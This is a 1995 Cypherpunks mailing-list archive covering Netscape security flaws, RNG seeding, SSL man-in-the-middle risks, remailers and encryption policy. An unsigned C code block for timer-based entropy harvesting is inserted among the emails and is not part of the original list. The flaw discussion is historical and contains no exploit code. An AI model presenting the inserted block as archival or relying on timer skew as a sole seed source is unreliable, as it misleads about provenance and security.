"This is just another indication that Netscape isn't being careful," said William Cheswick, a security researcher at AT&T Corp.'s Bell Laboratories. Still, he said, the flaw goes well beyond Netscape. It first reared its head seven years ago when Cornell graduate student Robert Morris used it to create a "worm" that crippled thousands of computers on the Internet. Last February, the same kind of flaw was found in the popular Mosaic program created by the University of Illinois. But that strain of the flaw was more serious than its latest appearance because it affected the computers that store many users' credit-card numbers.

Now experts are discovering that the flaw shows up in other so-called Web browsers such as Links and Arena. "We're so glad that the network dog dances, we don't realize that it's rabid," Mr. Cheswick said of the programming quality of many software packages.

Marc Andreessen, vice president of technology at Netscape, said the company will issue fixes for the recent glitches later this week. He added that it's unclear whether anything other than temporarily crashing a user's computer could result from the recent flaw. But, he said, once users adopt the modified software, "this won't be around long enough to cause a problem."

Some, however, worry that another variation of the flaw will prove more difficult to cope with in the coming months.
Bruce Fancher, president of Phantom Access Technologies Inc., operator of the Mindvox Internet access service, said a variation of the security hole has been found in several Unix software packages, which run on thousands of Internet computers that contain users' credit-card numbers and other personal information. It could cause far more damage than the Netscape flaw, he said.

"This is going to be a big problem," warned Mr. Fancher, adding that he's been told that hackers are already devising software toolkits to exploit the hole. "This flaw is an easy mistake to make, but it's also easy to fix," he said.

The latest flaw came to light early Friday morning when a reader of the Cypherpunk mailing list discovered the glitch and posted a message to the Internet. Basically, the software on an end-user's machine allows for commands that are too long, letting an intruder tack on an extra line of damaging code that could crash the computer. Instead, the software should verify the length of the commands that computers accept.

Security buffs concede that the recent round of security glitches found in several pieces of software, including a virus found in Microsoft Corp.'s Word program and security problems at America Online Inc., has shaken confidence in electronic commerce. But they say the publicity brings to light problems that will ultimately make software more secure.

Richard Lethin, a graduate student at Massachusetts Institute of Technology who participates in the Cypherpunk discussion, said: "This technology for electronic commerce is ultimately going to be real important, but there might be some hiccups at the start."
[End]

From dmandl at panix.com Mon Sep 25 10:07:19 1995
From: dmandl at panix.com (dmandl at panix.com)
Date: Mon, 25 Sep 95 10:07:19 PDT
Subject: (Another) WSJ article
Message-ID:

Netscape Software for Cruising Internet Is Found to Have Another Security Flaw

Another security flaw that has long plagued the Internet has been found in software by Netscape Communications Corp. and others, raising concerns for the privacy and safety of information on the global computer network.

The flaw in Netscape's popular Navigator software, which helps users cruise the multimedia portion of the Internet known as the World Wide Web, is the third defect in the software discovered by the "Cypherpunks" discussion group in little over a month.

[end of excerpt--it's a long article]

The article quotes William Cheswick and Rich Lethin, and mentions the cypherpunks several times.

--Dave.

-- 
Dave Mandl
dmandl at panix.com
http://wfmu.org/~davem

From raph at CS.Berkeley.EDU Mon Sep 25 10:08:09 1995
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Mon, 25 Sep 95 10:08:09 PDT
Subject: List of reliable remailers
Message-ID: <199509251350.GAA05287@kiwi.cs.berkeley.edu>

I operate a remailer pinging service which collects detailed information about remailer features and reliability.

To use it, just finger remailer-list at kiwi.cs.berkeley.edu

There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

For the PGP public keys of the remailers, finger pgpkeys at kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

This is an automatically generated listing of remailers.
The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu.

$remailer{"extropia"} = " cpunk pgp special";
$remailer{"portal"} = " cpunk pgp hash";
$remailer{"alumni"} = " cpunk pgp hash";
$remailer{"bsu-cs"} = " cpunk hash ksub";
$remailer{"c2"} = " eric pgp hash reord";
$remailer{"penet"} = " penet post";
$remailer{"ideath"} = " cpunk hash ksub reord";
$remailer{"hacktic"} = " cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = " cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = " cpunk pgp hash filter";
$remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = " cpunk pgp hash cut reord mix post";
$remailer{"ford"} = " cpunk pgp hash ksub";
$remailer{"hroller"} = " cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = " cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = " cpunk pgp hash latent cut mix ek reord";
$remailer{"robo"} = " cpunk hash mix";
$remailer{"replay"} = " cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = " cpunk mix pgp hash latent cut ek reord";
$remailer{"gondolin"} = " cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = " mix cpunk pgp hash latent cut";
$remailer{"ncognito"} = " cpunk";
$remailer{"precip"} = " cpunk mix pgp hash latent cut ek reord";
$remailer{"ecafe"} = " cpunk";

catalyst at netcom.com is _not_ a remailer.
lmccarth at ducie.cs.umass.edu is _not_ a remailer.
usura at replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys at kiwi.cs.berkeley.edu" to get PGP keys for the remailers. Fingering this address works too.

News: the remailer list has been rewritten, and the new version is live! It should be more accurate, reliable, and faster than before. Penet is back up! Enjoy.
remailer  email address                        history       latency  uptime
-----------------------------------------------------------------------
robo      robo at c2.org                        ##*#####+###     1:51   99.99%
hroller   hroller at c2.org                     ########+###     1:47   99.99%
syrinx    syrinx at c2.org                      -+++--+--+-+    51:38   99.98%
ford      remailer at bi-node.zerberus.de       +*--*++**+*#    16:30   99.98%
mix       mixmaster at remail.obscura.com       ._..-+.-++-   4:38:15   99.98%
crown     mixmaster at kether.alias.net         --++------++  1:51:07   99.97%
alumni    hal at alumni.caltech.edu             *+##+*-*##*#     6:32   99.97%
gondolin  mixmaster at gondolin.org             --_.-+---+**  3:26:27   99.96%
hacktic   remailer at utopia.hacktic.nl         ++****+*****     9:35   99.95%
ecafe     remail at ecafe.org                          *--**    35:01   99.95%
bsu-cs    nowhere at bsu-cs.bsu.edu             **#+*# #*#+#     7:02   99.83%
replay    remailer at replay.com                ++***- +**+*    10:10   99.75%
flame     remailer at flame.alias.net           ++**++ *****    25:42   99.74%
extropia  remail at extropia.wimsey.com         ----.-.-.--  12:36:15   99.63%
rmadillo  remailer at armadillo.com             +++ + ++ ++     51:06   99.29%
spook     remailer at spook.alias.net           -----------   2:55:48   99.14%
portal    hfinney at shell.portal.com           #+####-## #      5:37   98.89%
ideath    remailer at ideath.goldenbear.com     ---+__.-.-   12:16:28   98.18%
penet     anon at anon.penet.fi                 * + - - ++    3:46:46   94.95%
c2        remail at c2.org                      *+ * +- +++     49:41   94.46%
vishnu    mixmaster at vishnu.alias.net         +++-+++ *+*     23:25   93.99%
rahul     homer at rahul.net                    *#+#*****#*#     1:21   99.99%
ncognito  ncognito at gate.net                            ++     6:59    9.32%

History key
  #  response in less than 5 minutes.
  *  response in less than 1 hour.
  +  response in less than 4 hours.
  -  response in less than 24 hours.
  .  response in more than 1 day.
  _  response came back too late (more than 2 days).

cpunk    A major class of remailers. Supports Request-Remailing-To: field.
eric     A variant of the cpunk style. Uses Anon-Send-To: instead.
penet    The third class of remailers (at least for right now). Uses X-Anon-To: in the header.
pgp      Remailer supports encryption with PGP.
         A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID.
hash     Supports ## pasting, so anything can be put into the headers of outgoing messages.
ksub     Remailer always kills subject header, even in non-pgp mode.
nsub     Remailer always preserves subject header, even in pgp mode.
latent   Supports Matt Ghio's Latent-Time: option.
cut      Supports Matt Ghio's Cutmarks: option.
post     Post to Usenet using Post-To: or Anon-Post-To: header.
ek       Encrypt responses in reply blocks using Encrypt-Key: header.
special  Accepts only pgp encrypted messages.
mix      Can accept messages in Mixmaster format.
reord    Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself.
mon      Remailer has been known to monitor contents of private email.
filter   Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering.

Raph Levien

From mike at icanect.net Mon Sep 25 10:08:47 1995
From: mike at icanect.net (Michael Taht)
Date: Mon, 25 Sep 95 10:08:47 PDT
Subject: Key signing at Miami Convention
Message-ID: <199509251301.JAA05080@alice.icanect.net>

I am giving an internet security seminar at the "The Internet and World Wide Web" Conference at the Miami Hyatt Regency, tomorrow, Tuesday, Sept 26, all day. I'll be armed with a laptop if there are folk attending that want to sign and exchange PGP keys.

________________
Michael

-- 
Michael Taht             | "You got me hummin" - B. Joel
VP, Technical Stuff      | "Ain't nobody's bizness" - Taj Mahal
mike at icanect.net         | "I'm from the government,
http://www.icanect.net   |  I'm here to help" - Anon

From jya at pipeline.com Mon Sep 25 10:09:08 1995
From: jya at pipeline.com (John Young)
Date: Mon, 25 Sep 95 10:09:08 PDT
Subject: JAV_jiv
Message-ID: <199509251313.JAA08442@pipe4.nyc.pipeline.com>

9-25-95.
NYPaper: "Making the PC Come Alive. A Software Language That Puts You in the Picture." By John Markoff

A new computer language known as Java is an emerging technology that many industry experts expect to be the next big thing in computing. Just as popular World Wide Web "browser" software like Netscape has transformed the Web from a scientist's research tool into a consumer medium over the last two years, many computer industry researchers and executives predict that the Java programming language will transport the Web to the next level.

JAV_jiv (17 kb)

From bianco at itribe.net Mon Sep 25 10:09:45 1995
From: bianco at itribe.net (David J. Bianco)
Date: Mon, 25 Sep 95 10:09:45 PDT
Subject: Netscape "random" number seed generator code available
In-Reply-To: <4454nu$da8@tera.mcom.com>
Message-ID: <199509251256.IAA27310@gatekeeper.itribe.net>

On Sep 25, 2:38, Phil Karlton sent the following to the NSA's mail archives:
> Subject: Netscape "random" number seed generator code available
|| As is mentioned in the README, more will need to be done to find more
|| bits of entropy. (Too much of a good thing is still not enough.)
|| However the security team believes that the RNG seed is no longer the
|| weak link and candidate for attack. So I am personally volunteering
|| to have my head shaved if a discovered deficiency in this code results
|| in an easily attacked generated seed. [You will be expected to show
|| your work. :-)]
||

Will you put a picture up on http://www.netscape.com/ if someone does find a problem? 8-)

-- 
==========================================================================
David J. Bianco                | Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.                   | Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center | email:
Norfolk, VA 23510              | URL  : http://www.itribe.net/~bianco/

From bianco at itribe.net Mon Sep 25 10:10:14 1995
From: bianco at itribe.net (David J.
Bianco)
Date: Mon, 25 Sep 95 10:10:14 PDT
Subject: SSL Man-in-the-middle
In-Reply-To:
Message-ID: <199509251247.IAA27297@gatekeeper.itribe.net>

On Sep 25, 9:35, Eric Young sent the following to the NSA's mail archives:
> Subject: Re: SSL Man-in-the-middle
||
|| On Fri, 22 Sep 1995, David J. Bianco wrote:
|| > Has anyone given much thought to the feasibility of a man-in-the-middle
|| > attack against an SSL (or other similar) transaction? To me, the
|| > possibility seems obvious, so I figure it must have been discussed before,
|| > though I haven't seen it.
|| ....
|| > Since neither the browser nor the server perform any authentication checks,
|| > neither Bob nor Alice know they are really speaking to Mallet. The best
|| > Alice can do is check the IP address of the client she's speaking to, but
||
|| Ah, err, the infamous problem of Netscape Navigator refusing to talk to
|| SSL httpd's because they don't have a certificate issued by Verisign is
|| caused by the client authenticating the Server certificate.
|| To get a Verisign signed x509 certificate requires quite a bit of proof
|| that your company is who they claim they are. So server authentication
|| is used.
||

Not so. VeriSign can only vouch for identity, not intention. I can fork out $300 (at last count) and get a signed certificate for my fake company. If the stakes are high enough, I can incorporate fairly cheaply, get a business license, and then I'd have a real company I could submit as. Or, if I'm lazy, don't have enough money, or am unwilling to leave a paper trail, I'd break into someone's weakly secured server and steal their certificate. In either case, I've obtained a "legitimate" signed certificate for illegitimate purposes. That's why I don't think just verifying the signature on the certificate is nearly enough.

-- 
==========================================================================
David J. Bianco                | Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.
| Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center | email:
Norfolk, VA 23510              | URL  : http://www.itribe.net/~bianco/

From rfb at lehman.com Mon Sep 25 10:10:42 1995
From: rfb at lehman.com (Rick Busdiecker)
Date: Mon, 25 Sep 95 10:10:42 PDT
Subject: `Random' seed.
In-Reply-To: <9509251229.AA23816@alpha>
Message-ID: <9509251300.AA22090@cfdevx1.lehman.com>

-----BEGIN PGP SIGNED MESSAGE-----

    From: m5 at dev.tivoli.com (Mike McNally)
    Date: Mon, 25 Sep 1995 07:29:01 -0500

    I also have some doubts as to the randomness of this; I suspect that the kernel is rather deterministic in its scheduling practices.

I don't think that anyone has suggested otherwise. I believe that `clock skew' was the underlying source of randomness that Matt Blaze mentioned in the message where I first saw that code.

In any case, a number of people have expressed interest in seeing signs of non-random behavior. As far as I know, no one has said anything if they've found such signs. I've tried to find some, but only with very simple tests. I generated a quarter megabit and found that:

 - I can only compress it to about 32Kb, i.e. 256 k bits. Tim May has suggested that compressibility is getting to be a good metric for entropy.

 - It seems to contain roughly equal numbers of:
    * 0s and 1s
    * 00s, 01s, 10s, and 11s
    * etc. I forget how high I checked.

 - It contains some rather long sequences of 0s and 1s. I think on the order of 20.

I have no idea how reasonable it would be to use this approach in Netscape, however if it were available as an option to generate, say 300 bits, I'd personally be plenty willing to let it chew up five minutes while I get my morning caffeine. I realize that some people would not. It certainly couldn't hurt to throw a few bits gathered this way into the mix.

Also, it may be possible to get more than one bit of entropy per second using this approach, I was merely showing the code as Matt originally presented it.
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGanppNR+/jb2ZlNAQE2jQQAx1dj/WjMK4XeNr4mZxyW6G9TKL1ZKqOE tkePnuEujXQDxoEy5UNGWo36NG1hn564wprdS5e4aCQwZaPhPOuXZTd9uPEWXdqq j5WyNmzBqmSIlCU+wlEVnBpYWbgxdPC1Lx8ckkxxX07+F3B+ftibrfB+t7ysDDPC LOJ2PCXr/7I= =8lGs -----END PGP SIGNATURE----- -- Rick Busdiecker Please do not send electronic junk mail! net: rfb at lehman.com or rfb at cmu.edu PGP Public Key: 0xDBD9994D www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html send mail, subject "send index" for mailbot info, "send pgp key" gets my key From jya at pipeline.com Mon Sep 25 10:11:04 1995 From: jya at pipeline.com (John Young) Date: Mon, 25 Sep 95 10:11:04 PDT Subject: Golden Coy Freeh Message-ID: <199509251253.IAA07006@pipe4.nyc.pipeline.com> The New York Times, January 25, 1995, p. D5. The F.B.I. Sting Operation on Child Pornography Raises Questions About Cryptography By Peter H. Lewis Federal agents swooped down on more than 125 homes and offices across the United States on Sept. 13, seizing computers and diskettes from people suspected of trafficking in child pornography over the America Online network. But to date, the number of arrests in the sting operation remains at 15. More arrests are expected, but why haven't more occurred? Last week, Louis J. Freeh, the director of the F.B.I., offered an oblique explanation for the seemingly low initial success rate. At least some of the suspected child pornographers had used data encryption software, Mr. Freeh said Thursday in remarks at an International Cryptography Institute conference in Washington. In other words, they had scrambled their computer files so that only someone with the password -- or with proper code-breaking skills -- could view the contents. Mr. Freeh wisely did not say whether the F.B.I. agents were able to decipher the encrypted files seized in the investigation. It would be foolhardy, from a law-enforcement perspective, to tip one's hand. If the head of the F.B.I. 
acknowledged that his agency was powerless to crack a cryptography program like Pretty Good Privacy, the stampede for that software on the Internet would make the run on Windows 95 look puny. From a political perspective, Mr. Freeh's coyness is shrewd as well. By making even a subtle suggestion that some child pornographers may walk free because of unbreakable cryptography, he gains more leverage in seeking Government-mandated controls over the use of encryption technology. Mr. Freeh said that encryption was a "public safety" issue, and he said law-enforcement agencies around the world "will not tolerate" the use of private data encryption to impede investigations. He said encryption had also been encountered in the Philippines in a plot to blow up an American jet and to assassinate Pope John Paul II (in that case, at least, one can presume the code was cracked.) It seems worthwhile to point out that even if the suspects in the child pornography sting, called Operation Innocent Images, used cryptography, that did not provide evidence that they were doing something illegal. Our legal system is predicated on the belief that one is innocent unless proved guilty, and there is no exception clause for technology. "Fortunately we are not yet at the point where the mere use of encryption overcomes the presumption of innocence," said David Sobel, staff counsel for the Electronic Privacy Information Center in Washington. Another point to remember is that the F.B.I. identified more than 100 suspects, and gathered sufficient information to warrant raids, using existing laws and enforcement techniques. On the other hand, there is no denying that child pornographers use data encryption to keep co-workers, family members and police from discovering their secrets. "We are involved in a couple of jobs every week resolving some kind of a child pornography investigation," said Eric K. Thompson, president of Access Data Inc. 
of Orem, Utah, a private company that specializes in cracking encrypted files for corporations and Government agencies. The Government's elite codebreakers at the National Security Administration are prohibited by law from using their talents against American citizens. The F.B.I. has its own code-breaking experts, but it routinely calls on independent experts like Access Data to help on some cases. After eight years of breaking into encrypted files, ranging from situations involving secretaries who simply forgot their passwords for important memos to cases involving corporate computer systems that were encrypted by disgruntled employees, Mr. Thompson has concluded: "Basically, the criminal element is becoming more computer literate, and they are discovering encryption. Files are becoming more difficult to break." Dorothy Denning, an expert in cryptography and a professor of computer science at Georgetown University in Washington, said she recognized the importance of encryption for businesses seeking to protect information. At the same time, she said, she also recognized the problems that law-enforcement agencies face because of cryptography. "So many people had been saying people in law enforcement weren't having this problem, and I didn't believe that," Dr. Denning said. So in May, she said, she spent two days calling sources at law-enforcement organizations. "I came up with over 20 cases -- child pornography, terrorism, murder, embezzlement fraud, tax protesters, export violations -- and, in some cases, they were able to crack it, and others they couldn't," she said. What can be done? The Administration's plan is to seek voluntary compliance with a "key escrow" plan, which would enable citizens to use strong, private cryptography as long as a copy of the software "key" were made available to law enforcement officials. Last week, Mr. Freeh stressed that he preferred a voluntary approach. 
But "if consensus is impossible" on the encryption issue, he said, the F.B.I. might consider other approaches. The debate is certain to heat up as more information about Operation Innocent Images becomes known. There are no comforting answers, only an echo of advice from a time predating the Internet: There is no solution. Seek it wisely. [End] From m5 at dev.tivoli.com Mon Sep 25 10:12:28 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Mon, 25 Sep 95 10:12:28 PDT Subject: `Random' seed. In-Reply-To: <9509200915.ZM14792@glacius.alias.com> Message-ID: <9509251229.AA23816@alpha> Rick Busdiecker writes: > FWIW, I discussed this code briefly with an engineer at Netscape a > while back . . . . > signal(SIGALRM,printbit); > alarm(1); > while (1) > count++; I for one would be a little peeved if I found that my browser was consuming all available CPU bandwidth on my workstation. I also have some doubts as to the randomness of this; I suspect that the kernel is rather deterministic in its scheduling practices. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From rsnyder at janet.advsys.com Mon Sep 25 10:13:44 1995 From: rsnyder at janet.advsys.com (Bob Snyder) Date: Mon, 25 Sep 95 10:13:44 PDT Subject: Netscape for Linux? In-Reply-To: <199509250712.CAA01003@khijol> Message-ID: <199509251143.HAA19012@janet.advsys.com> khijol!erc at uunet.uu.net said: > As much as this might put me at odds with certain parts of the CP > community, this seems quite reasonable to me. After all, why should > someone provide support for a platform which is not generating > revenue? I don't think any of us disagree with that. I think what we disagree about is getting Netscape to accept our revenue. 
:-) I've tried calling and emailing to buy a copy of Linux, and the answer was always, "It's not available for Linux." Despite what's on their FTP server. I mostly want the stronger crypto in the US only version, but Netscape has said they are trying to make that available for FTP, so I can wait. I also want Java, but no one has that yet, and the 2.0 will probably be available for Linux, so I can wait for that too. From jim at acm.org Mon Sep 25 10:14:56 1995 From: jim at acm.org (Jim Gillogly) Date: Mon, 25 Sep 95 10:14:56 PDT Subject: Netscape "random" number seed generator code available In-Reply-To: <445j6k$h03@tera.mcom.com> Message-ID: <199509251159.EAA08528@mycroft.rand.org> > jsw at neon.netscape.com (Jeff Weinstein) writes: > More on the RNG stuff. On Unix systems we look for ~/.pgp/randseed.bin, > and feed it through the RNG hash. On Unix and PC systems we feed the > environment through the hash, so that would be a good place for a > concerned user to put some random stuff of their own. Interesting idea, but I have a (perhaps irrational) dislike for this idea. If Netscape wants to have its own netsceed.bin file to muck around with on my system, I'll authorize it to be set up, but I by god don't want it mucking around with my PGP setup. Network-aware programs must be more trusted than local-only programs, because they are the only kind that legitimately export information they glean from the local environment. If Netscape decided to ship the actual contents of my randseed.bin to somebody else (like escrow.fbi.org, for example) it might give them a better edge on finding session keys for my PGP sessions... the privacy of which I value more even than I value my Netscape transactions. I'm nervous enough about all the Easter Eggs that have been reported in Netscape, like the secret keystroke shortcut to get to Fishcam, or the different behavior it exhibits when it finds a certain obscurely-named directory at the top level. 
If it starts peeking at my PGP environment, though, I'm drawing the line. No, thanks. In summary -- set up your own netsceed.bin if you want, but don't peek at my PGP randomness. Jim Gillogly Trewesday, 4 Winterfilth S.R. 1995, 11:57 From perry at piermont.com Mon Sep 25 10:19:57 1995 From: perry at piermont.com (Perry E. Metzger) Date: Mon, 25 Sep 95 10:19:57 PDT Subject: Netscape for Linux? In-Reply-To: <445hej$h03@tera.mcom.com> Message-ID: <199509251135.HAA13693@frankenstein.piermont.com> Jeff Weinstein writes: > > ... would be nice if we could get 128 bit keys, though ... (hint, > > hint). > > We are working this issue with the government. As soon as we can > make it available for download we will. In other words, we will never see it in our lifetimes -- the bureaucreeps aren't known for promoting the spread of strong crypto. By the by, are you guys going to be taking any action vis a vis the discovery of weak keys in RC4? Perry From perry at piermont.com Mon Sep 25 10:22:06 1995 From: perry at piermont.com (Perry E. Metzger) Date: Mon, 25 Sep 95 10:22:06 PDT Subject: Netscape "random" number seed generator code available In-Reply-To: <445j6k$h03@tera.mcom.com> Message-ID: <199509251137.HAA13703@frankenstein.piermont.com> Jeff Weinstein writes: > More on the RNG stuff. On Unix systems we look for ~/.pgp/randseed.bin, > and feed it through the RNG hash. You should search for the PGPPATH environment variable rather than making assumptions about where it is... > On Unix and PC systems we feed the environment through the hash, so > that would be a good place for a concerned user to put some random > stuff of their own. Not a bad idea, but not a substitute for extracting enough bits of entropy on your own... 
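Perry's point above, that feeding the environment to the hash is no substitute for extracting enough bits of entropy yourself, and Rick's earlier message about what he checked in the bits he harvested, both come down to code. The block below is an added example written for this page, not Matt Blaze's snippet, Rick's test code or anything from Netscape: it implements the timer-skew sampler the thread quotes (spin a counter until the timer fires, keep the low bit), with the interval made adjustable through setitimer instead of a fixed alarm(1), and then the three quick checks Rick describes (count of ones, counts of the four digrams, longest run). It assumes a POSIX system with SIGALRM and setitimer; the compressibility test from the thread is not reproduced, since an external compressor does that job. The same caveats apply as in the thread: the loop burns a CPU while it runs, and these checks can only flag gross non-randomness, they cannot prove the bits carry entropy.

```c
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/time.h>

static volatile sig_atomic_t timer_fired;

static void on_alarm(int sig)
{
    (void)sig;
    timer_fired = 1;
}

/* One bit the way the quoted snippet harvests it: spin a counter until the
 * interval timer fires and keep the counter's low bit.  The interval is in
 * microseconds; the original used alarm(1), a full second per bit. */
int skew_bit(long usec)
{
    struct itimerval it;
    unsigned long count = 0;

    memset(&it, 0, sizeof it);
    it.it_value.tv_sec = usec / 1000000;
    it.it_value.tv_usec = usec % 1000000;
    timer_fired = 0;
    signal(SIGALRM, on_alarm);
    setitimer(ITIMER_REAL, &it, NULL);
    while (!timer_fired)
        count++;
    return (int)(count & 1UL);
}

/* Fill bits[0..n) from the timer source. */
void skew_bits(int *bits, int n, long usec)
{
    for (int i = 0; i < n; i++)
        bits[i] = skew_bit(usec);
}

/* Parse a string of '0'/'1' characters (constructed data) into bits. */
int parse_bits(const char *s, int *bits, int max)
{
    int n = 0;
    for (; *s != '\0' && n < max; s++)
        if (*s == '0' || *s == '1')
            bits[n++] = *s - '0';
    return n;
}

/* Check 1: how many ones among n bits (expect close to n/2). */
int count_ones(const int *bits, int n)
{
    int ones = 0;
    for (int i = 0; i < n; i++)
        ones += bits[i];
    return ones;
}

/* Check 2: out[0]=00, out[1]=01, out[2]=10, out[3]=11 over the n-1
 * overlapping pairs (expect the four counts to be roughly equal). */
void digram_counts(const int *bits, int n, int out[4])
{
    memset(out, 0, 4 * sizeof out[0]);
    for (int i = 0; i + 1 < n; i++)
        out[bits[i] * 2 + bits[i + 1]]++;
}

/* Check 3: longest run of identical bits (a run near log2(n) is normal). */
int longest_run(const int *bits, int n)
{
    int best = 0, cur = 0;
    for (int i = 0; i < n; i++) {
        cur = (i > 0 && bits[i] == bits[i - 1]) ? cur + 1 : 1;
        if (cur > best)
            best = cur;
    }
    return best;
}

int main(void)
{
    enum { N = 64 };
    int bits[N], d[4];

    skew_bits(bits, N, 2000);   /* 2 ms per bit: about 0.13 s for all 64 */
    digram_counts(bits, N, d);
    printf("ones %d/%d  digrams 00=%d 01=%d 10=%d 11=%d  longest run %d\n",
           count_ones(bits, N), N, d[0], d[1], d[2], d[3], longest_run(bits, N));
    return 0;
}
```

With a short interval the counter may be small enough that its low bit mostly reflects where the scheduler happened to put the process, which is the determinism Mike worries about; lengthening the interval costs time per bit, which is the trade-off Rick accepts. Either way the harvested bits should go into a mixing hash alongside other sources, not be used raw.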
Perry From rsnyder at janet.advsys.com Mon Sep 25 10:24:53 1995 From: rsnyder at janet.advsys.com (Bob Snyder) Date: Mon, 25 Sep 95 10:24:53 PDT Subject: Netscape "random" number seed generator code available In-Reply-To: <445j6k$h03@tera.mcom.com> Message-ID: <199509251138.HAA18954@janet.advsys.com> jsw at neon.netscape.com said: > More on the RNG stuff. On Unix systems we look for ~/.pgp/ > randseed.bin, and feed it through the RNG hash. On Unix and PC > systems we feed the environment through the hash, so that would be a > good place for a concerned user to put some random stuff of their > own. For UNIX, including the environment is pretty useless for determining a seed. On BSD-style machines, try a ps -uxeww. The environment is known by anyone who has access to the machine when the seed is generated, and possibly to many others, since some machines have SNMP daemons that will give out the process table, or may have the systat "service" turned on. The latter two may not include the environment on most machines, but I believe it conceivably could, and may be implementation specific from UNIX to UNIX. I greatly applaud Netscape for "going public" with this information, and remaining open to suggestions despite the bad publicity it has been getting. One of the large corporations I work with is looking to do electronic commerce with some pretty amazing $ amounts soon (at least, amazing to me), and I know I'm going to be asked about the security breaks. I feel confident that I can tell them exactly what is wrong, and what Netscape is doing to fix it, and that I don't think it should be a matter for great concern. I'm not sure I could have done that had Netscape done nothing but issue the press release and weather the bad press in silence. 
Bob From rah at shipwright.com Mon Sep 25 10:27:29 1995 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 25 Sep 95 10:27:29 PDT Subject: Electronic Commerce Message-ID: --- begin forwarded text From: Ravi Kalakota Subject: Electronic Commerce To: www-buyinfo at allegra.att.com Date: Sun, 24 Sep 1995 23:52:47 -0600 (CDT) Mime-Version: 1.0 (If you have seen this before, we apologize ....) ---------------------------------------------------------- FINAL CALL for Participation International Conference on Electronic Commerce This posting includes: Final Program, Registration form, Hotel, and Speaker information. All other conference related information can be found at: ----> http://cism.bus.utexas.edu/ravi/ecomm.html Thanks, -- Ravi Kalakota and Andrew Whinston (Conference Organizers) If you are interested, please register quickly as we have limited space available and will not be able to accommodate more than conference room capacity. ************* FINAL PROGRAM *********** Sixth conference on Organizational Computing, Coordination and Collaboration INTERNATIONAL CONFERENCE ON ELECTRONIC COMMERCE Theme: Frontiers of Electronic Commerce October 30-31, 1995 ------------------- Sunday, October 29 6-7:00 p.m. Reception at Red Lion Hotel, 6121 North IH 35, Austin, Texas ------------------- Monday, October 30 7:45 a.m. Continental Breakfast 8:15 a.m. Welcome Address Session I: Internet-Based Commerce: The Promises and Pitfalls ------------------------------------------------ 8:30 a.m. An Unaffiliated View of Electronic Commerce Dave Crocker Brandenburg Consulting Issues in Electronic Commerce: The First Virtual Experience Nathaniel Borenstein First Virtual Holdings Session II: Electronic Payment Systems ------------------------------------------------ 10:30 a.m. Implementing Online Payments: The NetCash and NetCheque Systems Clifford Neuman USC/ISI Systems of Electronic Commerce: Payment and More Win Treese Open Market, Inc. 
Session III: Electronic Catalogs and Brokerages ------------------------------------------------ 1:30 p.m. Smart Catalogs and Virtual Catalogs Arthur M. Keller Stanford University and Commerce Net Organizing for Electronic Commerce Ravi Kalakota The University of Rochester Session IV: World Wide Web and Electronic Documents ------------------------------------------------ 3:30 p.m. Formalizing Web Technology Dan Connolly Massachusetts Institute of Technology/W3 Organization Document Issues in Electronic Commerce Larry Masinter Xerox Palo Alto Research Center ------------------------------------ 6:30 p.m.Banquet at Red Lion Hotel ------------------------------------ Tuesday, October 31 8:00 a.m. Continental Breakfast Session V: Internet Marketing and Demographics ------------------------------------------------ 8:30 a.m. Marketing on the Internet: Who is Making Money? Jill H. Ellsworth Oak Ridge Research Measuring the Internet Audience Donna Hoffman Vanderbilt University and Interval Research Corporation Session VI: Supply Chain Management ------------------------------------------------ 10:30 a.m.Electronic Commerce and Supply Chain Management Jan Stallaert The University of Texas at Austin Electronic Data Interchange Forrest Malone Electronic Commerce Resource Center Session VII: Economics and Electronic Commerce ---------------------------------------------------------- 1:00 p.m. Electronic Auctions and Application to Spread Spectrum Band-Width Allocations Preston McAfee Massachusetts Institute of Technology Product and Infrastructure Pricing Andrew Whinston and Dale Stahl The University of Texas at Austin Internet Service Providers: Changing Dynamics Smoot Carl-Mitchell and John Quarterman Zilker Internet Park, Matrix Information and Directory Services, Inc. Session VIII: Panel Discussion: Issues in Internet Commerce ------------------------------------------------ Su-Shing Chen, National Science Foundation James B. 
